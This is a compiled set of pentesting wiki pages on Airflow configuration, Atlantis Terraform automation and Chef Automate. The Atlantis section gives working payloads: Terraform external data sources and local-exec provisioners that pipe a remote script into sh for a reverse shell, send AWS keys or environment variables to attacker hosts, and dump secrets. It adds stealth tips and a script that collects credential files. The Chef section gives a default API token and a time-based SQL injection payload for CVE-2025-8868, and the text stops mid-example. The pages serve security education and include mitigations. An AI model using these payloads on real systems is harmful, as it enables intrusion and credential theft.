- **`security`**: What security module to use (for example kerberos)
### \[dask]
- **`tls_ca`**: Path to ca
- **`tls_cert`**: Path to the cert
- **`tls_key`**: Path to the tls key
### \[kerberos]
- **`ccache`**: Path to ccache file
- **`forwardable`**: Enabled by default
### \[logging]
- **`google_key_path`**: Path to GCP JSON creds.
### \[secrets]
- **`backend`**: Full class name of secrets backend to enable
- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
### \[smtp]
- **`smtp_password`**: SMTP password
- **`smtp_user`**: SMTP user
### \[webserver]
- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
- **`cookie_secure`**: Set **secure flag** on the session cookie
- **`expose_config`**: By default it's False; if true, the **config** can be **read** from the web **console**
- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
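As a quick triage sketch for a recovered `airflow.cfg` (the config excerpt and the key list below are illustrative, not from a real host):

```python
import configparser

# Made-up airflow.cfg excerpt used for demonstration
cfg_text = """
[webserver]
expose_config = True
secret_key = SUPER_SECRET_FLASK_KEY

[smtp]
smtp_user = alerts@example.com
smtp_password = hunter2
"""

# Keys from the sections above that are worth extracting
SENSITIVE = {"secret_key", "smtp_password", "fernet_key",
             "flower_basic_auth", "result_backend", "google_key_path"}

cp = configparser.ConfigParser()
cp.read_string(cfg_text)
findings = {f"{section}.{key}": value
            for section in cp.sections()
            for key, value in cp.items(section)
            if key in SENSITIVE}
print(findings)  # {'webserver.secret_key': 'SUPER_SECRET_FLASK_KEY', 'smtp.smtp_password': 'hunter2'}
```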
### Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
```bash
AUTH_TYPE = AUTH_DB
```
Which means that the **authentication is checked against the database**. However, other configurations are possible like
```bash
AUTH_TYPE = AUTH_OAUTH
```
To leave the **authentication to third party services**.
However, there is also an option to **allow anonymous users access**, setting the following parameter to the **desired role**:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
{{#include ../../banners/hacktricks-training.md}}

## RBAC
[From the docs](https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html): Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users can **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to them.
- **`Admin`** users have all possible permissions.
- **`Public`** users (anonymous) don't have any permissions.
- **`Viewer`** users have limited viewer permissions (read only). They **cannot see the config.**
- **`User`** users have `Viewer` permissions plus additional user permissions that allow them to manage DAGs a bit. They **can see the config file.**
- **`Op`** users have `User` permissions plus additional op permissions.
Note that **admin** users can **create more roles** with more **granular permissions**.
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
### Default Permissions
These are the default permissions per default role:
- **Admin**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
- **Op**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
- **User**
\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
- **Viewer**
\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}

{{#include ../banners/hacktricks-training.md}}
### Basic Information
Atlantis basically helps you run terraform from Pull Requests from your git server.
![](<../images/image (161).png>)
### Local Lab
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
1. You can access the web page in 127.0.0.1:4141
### Atlantis Access
#### Git Server Credentials
**Atlantis** supports several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage creating a user in these platforms specifically for Atlantis, but some people might use personal accounts.
> [!WARNING]
> In any case, from an attacker's perspective, the **Atlantis account** is going to be a very **interesting** one **to compromise**.
#### Webhooks
Atlantis optionally uses [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
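For context, GitHub-style webhook secrets work by HMAC-signing each delivery body; the receiver (here, Atlantis) recomputes the signature and compares it in constant time. A sketch with example values:

```python
import hashlib
import hmac

secret = b"example-webhook-secret"  # shared secret configured on both sides
body = b'{"action": "opened"}'      # raw webhook payload as delivered

# Git host side: GitHub sends this value in the X-Hub-Signature-256 header
signature = "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()

# Receiver side: recompute from the shared secret and compare in constant time
expected = "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()
print(hmac.compare_digest(signature, expected))  # True for a legitimate delivery
```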
> [!WARNING]
> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attacker's perspective it would be interesting to know **if you can send it messages**.
#### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
> [!WARNING]
> The **container** where **Atlantis** is **running** will very likely **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
#### Web Page
By default Atlantis will run a **web page on port 4141 on localhost**. This page just allows you to enable/disable atlantis apply, check the plan status of the repos and unlock them (it doesn't allow you to modify things, so it isn't that useful).
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are, `atlantis`:`atlantis` are the **default** ones).
### Server Configuration
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
Values are **chosen in this order**:
1. Flags
2. Environment Variables
3. Config File
> [!WARNING]
> Note that in the configuration you might find interesting values such as **tokens and passwords**.
#### Repos Configuration
Some configurations affect **how the repos are managed**. However, it's possible that **each repo requires different settings**, so there are ways to specify each repo. This is the priority order:
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
3. **Default** values
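For illustration, a server-side repo config (passed via `--repo-config`) that enables the dangerous overrides mentioned above could look like this (keys follow the Atlantis docs; the values are examples):

```yaml
# repos.yaml -- example server-side config (illustrative values)
repos:
- id: /.*/                       # regex matching every repo
  allowed_overrides: [workflow]  # repo-level atlantis.yaml may pick the workflow
  allow_custom_workflows: true   # repo-level atlantis.yaml may define workflows
```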
**PR Protections**
Atlantis allows you to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, setting both options is recommended.
如果 `allowed_overrides` True,这些设置可以在每个项目的 `/atlantis.yml` 文件中 **被覆盖**
In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
**Scripts**
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. However, if there is a configured script to execute that is located in the same repo, it's possible to **modify its content in a PR and make it execute arbitrary code.**
**Workflow**
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
> [!CAUTION]
> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
>
> ```yaml
> # atlantis.yaml
> steps: - run: my custom apply command
> ```
**Conftest Policy Checking**
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common use cases for this step include:
- Denying usage of a list of modules
- Asserting attributes of a resource at creation time
- Catching unintentional resource deletions
- Preventing security risks (i.e., exposing secure ports to the public)
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
### Atlantis Commands
[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
```bash
# Get help
atlantis help
atlantis plan [options] -- [terraform plan flags]
atlantis apply [options] -- [terraform apply flags]
## --verbose
## You can also add extra terraform options
```
### Attacks
> [!WARNING]
> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
You can fix it by running:
```
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
```
#### Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
```json
data "external" "example" {
  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
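A variant of the same primitive can quietly exfiltrate the runner's environment variables instead of spawning a reverse shell. This is only a sketch, assuming the server has outbound HTTP access; `attacker.example.com` is a hypothetical listener you control:

```json
# Hypothetical payload: the "external" data source requires the program to
# print a JSON object on stdout, hence the trailing echo.
data "external" "env_leak" {
  program = ["sh", "-c", "curl -s --data \"$(env | base64 | tr -d '\\n')\" https://attacker.example.com/collect; echo '{\"done\":\"1\"}'"]
}
```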
**Stealthier Attack**
You can perform this attack even in a **stealthier way**, by following these suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
```javascript
module "not_rev_shell" {
  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
#### Atlantis plan Secrets Dump
You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
```json
output "dotoken" {
  value = nonsensitive(var.do_token)
}
```
#### Atlantis apply RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
However, you will usually need to bypass some protections:
- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection needs to be bypassed).
- Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure a payload like one of the following ends up in the `main.tf` file:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
  provisioner "local-exec" {
    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
  }
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
  provisioner "local-exec" {
    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
  }
}
```
Follow the **suggestions from the previous technique** to perform this attack in a **stealthier way**.
#### Terraform Param Injection
When running `atlantis plan` or `atlantis apply`, terraform is run under the hood, and you can pass commands through to terraform from Atlantis by commenting something like:
```bash
atlantis plan -- <terraform commands>
atlantis plan -- -h #Get terraform plan help
atlantis apply -- <terraform commands>
atlantis apply -- -h #Get terraform apply help
```
Something you can pass this way are env variables, which might be helpful to bypass some protections. Check the terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
#### Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** the one from `master`.\
This possibility was mentioned in a previous section:
> [!CAUTION]
> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. The **`allowed_overrides`** setting may also need to include **`workflow`** to allow **overriding the workflow** that is going to be used.
>
> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
>
> ```yaml
> # atlantis.yaml
> version: 3
> projects:
> - dir: .
>   workflow: custom1
> workflows:
>   custom1:
>     apply:
>       steps:
>       - run: my custom apply command
> ```
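As a concrete sketch (assuming the server sets `allow_custom_workflows: true` and `allowed_overrides: [workflow]`), a PR-controlled `atlantis.yaml` could swap the plan step for an arbitrary command; the beacon URL below is a placeholder:

```yaml
# Hypothetical malicious atlantis.yaml committed in the PR branch
version: 3
projects:
- dir: .
  workflow: pwn
workflows:
  pwn:
    plan:
      steps:
      - run: curl -s https://attacker.example.com/beacon?u=$(whoami)  # runs on the Atlantis server
```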
#### Bypass plan/apply protections
If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` includes `apply_requirements`, a repo can **modify the plan/apply protections to bypass them**.
```yaml
repos:
- id: /.*/
  apply_requirements: []
```
#### PR Hijacking
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
Moreover, if you haven't configured the **branch protection** to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
This is the **setting** in Github branch protections:
![](<../images/image (216).png>)
#### Webhook Secret
If you manage to **steal the webhook secret** being used, or if there **isn't any webhook secret** in place, you could **call the Atlantis webhook** and **invoke atlantis commands** directly.
#### Bitbucket
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
### Post-Exploitation
If you managed to get access to the server, or at least obtained an LFI, there are some interesting files you should try to read:
- `/home/atlantis/.git-credentials` Contains vcs access credentials
- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
- `/atlantis-data/repos/<org_name>/<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform state file
- Example: /atlantis-data/repos/ghOrg/myRepo/20/default/env/prod/.terraform/terraform.tfstate
- `/proc/1/environ` Env variables
- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
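The file reads above can be scripted; this is a small post-exploitation sketch (the paths mirror the list, and the state-file glob pattern is an assumption about the layout):

```python
import glob

# Candidate loot on an Atlantis server; the glob covers per-PR state files.
CANDIDATE_PATHS = [
    "/home/atlantis/.git-credentials",
    "/atlantis-data/atlantis.db",
    "/proc/1/environ",
] + glob.glob("/atlantis-data/repos/*/*/*/*/**/.terraform/terraform.tfstate",
              recursive=True)

def collect(paths):
    """Return {path: first 4 KiB} for every file that exists and is readable."""
    loot = {}
    for p in paths:
        try:
            with open(p, "rb") as f:
                loot[p] = f.read(4096)
        except OSError:
            continue  # missing or unreadable, skip
    return loot

if __name__ == "__main__":
    for path, data in collect(CANDIDATE_PATHS).items():
        print(f"{path}: {len(data)} bytes")
```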
### Mitigations
#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
#### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
Atlantis requires you to specify an allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
To prevent this, you could:
1. Bake providers into the Atlantis image or host and deny egress in production.
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
#### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
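Webhook secrets work because the VCS computes an HMAC of every delivery's raw body with the shared secret, which the receiver recomputes and compares. A minimal sketch of the GitHub-style check (the documented `X-Hub-Signature-256` scheme; illustrative, not Atlantis' actual code):

```python
import hashlib
import hmac

def verify_github_signature(secret: bytes, body: bytes, signature_header: str) -> bool:
    """Validate 'X-Hub-Signature-256: sha256=<hex HMAC-SHA256 of raw body>'."""
    expected = "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()
    # constant-time compare to avoid leaking the digest byte by byte
    return hmac.compare_digest(expected, signature_header)
```

Without the secret, a spoofed request cannot produce a valid signature even if the attacker knows the payload format.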
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
#### Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
#### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
It is strongly recommended to enable authentication in the web service. Enable BasicAuth using `--web-basic-auth=true` and set up a username and password using the `--web-username=yourUsername` and `--web-password=yourPassword` flags.
You can also pass these as the environment variables `ATLANTIS_WEB_BASIC_AUTH=true`, `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
### References
- [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)
- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
{{#include ../banners/hacktricks-training.md}}

# Chef Automate Security
{{#include ../../banners/hacktricks-training.md}}
## What is Chef Automate
Chef Automate is a platform for infrastructure automation, compliance, and application delivery. It exposes a web UI (often Angular) that talks to backend gRPC services via a gRPC-Gateway, providing REST-like endpoints under paths such as /api/v0/.
- Common backend components: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
- Auth mechanisms: user/API tokens and a data collector token header x-data-collector-token
## Enumeration & Attacks
chef-automate-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

## Overview
This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:
- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
- Abusing the x-data-collector-token authentication header when defaults are present
- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
## Recon: Architecture and Fingerprints
- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
- API transport: REST to gRPC via gRPC-Gateway
  - Responses may include grpc-metadata-content-type: application/grpc
- Database/driver fingerprints:
  - Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
- Interesting Compliance endpoints (auth required):
  - POST /api/v0/compliance/profiles/search
  - POST /api/v0/compliance/scanner/jobs/search
## Auth: Data Collector Token (x-data-collector-token)
Chef Automate exposes a data collector that authenticates requests via a dedicated header:
- Header: x-data-collector-token
- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
  - 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.
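For quick validation, a probe request can be assembled with the default token. The sketch below only builds the request (sending it is one `urlopen` call); `automate.example.com` is a placeholder target:

```python
import json
import urllib.request

DEFAULT_TOKEN = "93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506"

def build_profiles_search(base_url: str, token: str = DEFAULT_TOKEN) -> urllib.request.Request:
    """Build (but don't send) a Compliance profiles/search request
    authenticated with the data collector token header."""
    body = json.dumps({"filters": [{"type": "name", "values": ["test"]}]}).encode()
    return urllib.request.Request(
        base_url + "/api/v0/compliance/profiles/search",
        data=body,
        headers={
            "x-data-collector-token": token,
            "Content-Type": "application/json",
        },
        method="POST",
    )

# To probe a (hypothetical) target:
# resp = urllib.request.urlopen(build_profiles_search("https://automate.example.com"))
```

A successful response using the default token indicates the instance never rotated it.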
## API Schema Inference via Error-Driven Discovery
gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
- type: string
- values: array of strings
Example request shape:
```json
{
  "filters": [
    { "type": "name", "values": ["test"] }
  ]
}
```
Malformed JSON or wrong field types typically trigger 4xx/5xx with hints, and headers indicate the gRPC-Gateway behavior. Use these to map fields and localize injection surfaces.
## Compliance API SQL Injection (CVE-2025-8868)
- Affected endpoint: POST /api/v0/compliance/profiles/search
- Injection point: filters[].type
- Vulnerability class: time-based blind SQL injection in PostgreSQL
- Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.
Working time-based payload:
```json
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```
Technique notes:
- Close the original string with a single quote
- Concatenate a subquery that calls pg_sleep(N)
- Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded
### Proof via differential latency
Send paired requests and compare response times to validate server-side execution:
- N = 1 second
```
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
```
- N = 5 seconds
```
